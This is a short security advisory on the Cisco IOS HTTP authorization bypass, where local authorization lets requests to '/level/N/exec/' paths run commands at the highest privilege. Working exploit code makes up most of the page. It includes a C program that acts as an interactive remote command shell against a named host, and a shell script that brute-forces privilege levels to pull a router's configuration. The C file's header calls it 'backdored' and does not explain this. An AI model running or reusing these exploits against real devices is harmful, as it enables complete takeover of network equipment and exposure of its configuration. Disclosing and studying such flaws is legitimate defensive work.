|
|
|
|
| |
When HTTP server is enabled and local authorization is used, it is possible to bypass the authentication and execute any command on the Cisco device. This gives a remote user the ability to obtain complete control over the device - all commands will be executed with the highest privilege (level 15).
The following is an exploit code that can be used to detect this vulnerability.
For more information on this vulnerability, please see our previous post:
Cisco IOS HTTP Authorization Vulnerability |
| |
Credit:
The information has been provided by Eliel C. Sardanons
|
| |
Exploit code #1:
/* Coded and backdored by Eliel C. Sardanons <eliel.sardanons@philips.edu.ar>
* to compile:
* bash# gcc -o cisco cisco.c
*/
#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define HTTP_PORT 80
#define PROMPT "\ncisco$ "
int usage (char *progname) {
printf ("Usage:\n\t%s server\n", progname);
exit(-1);
}
int main (int argc, char *argv[]) {
struct hostent *he;
struct sockaddr_in sin;
int sck, i;
char command[256], buffer[512];
if (argc < 2)
usage(argv[0]);
if ((he = gethostbyname(argv[1])) == NULL) {
perror("host()");
exit(-1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(HTTP_PORT);
sin.sin_addr = *((struct in_addr *)he->h_addr);
while (1) {
if ((sck = socket (AF_INET, SOCK_STREAM, 6)) <= 0) {
perror("socket()");
exit(-1);
}
if ((connect(sck, (struct sockaddr *)&sin, sizeof(sin))) < 0) {
perror ("connect()");
exit(-1);
}
printf (PROMPT);
fgets (command, 256, stdin);
if (strlen(command) == 1)
break;
for (i=0;i<strlen(command);i++) {
if (command[i] == ' ')
command[i] = '/';
}
snprintf (buffer, sizeof(buffer),
"GET /level/16/exec/%s HTTP/1.0\r\n\r\n", command);
write (sck, buffer, strlen(buffer));
memset (buffer, 0, sizeof(buffer));
while ((read (sck, buffer, sizeof(buffer))) != 0) {
if ((strstr(buffer, "CR</A>")) != 0) {
printf ("You need to complete the command with more parameters or finish the command with 'CR'\n");
memset (buffer, 0, sizeof(buffer));
break;
} else if ((strstr(buffer, "Unauthorized")) != 0) {
printf ("Server not vulnerable\n");
exit(-1);
} else {
printf ("%s", buffer);
memset (buffer, 0, sizeof(buffer));
}
}
}
printf ("Thanks...\n");
exit(0);
}
Exploit code #2:
#!/bin/sh
#=============================================================================
# $Id: ios-http-auth.sh,v 1.1 2001/06/29 00:59:44 root Exp root $
#
# Brute force IOS HTTP authorization vulnerability (Cisco Bug ID CSCdt93862).
#=============================================================================
TARGET=192.168.10.20
FETCH="/usr/bin/fetch"
LEVEL=16 # Start Level
EXPLOITABLE=0 # Counter
while [ $LEVEL -lt 100 ]; do
CMD="${FETCH} http://${TARGET}/level/${LEVEL}/exec/show/config"
echo; echo ${CMD}
if (${CMD}) then
EXPLOITABLE=`expr ${EXPLOITABLE} + 1`
fi
LEVEL=`expr $LEVEL + 1`
done;
echo; echo All done
echo "${EXPLOITABLE} exploitable levels"
|
|
|
|
|
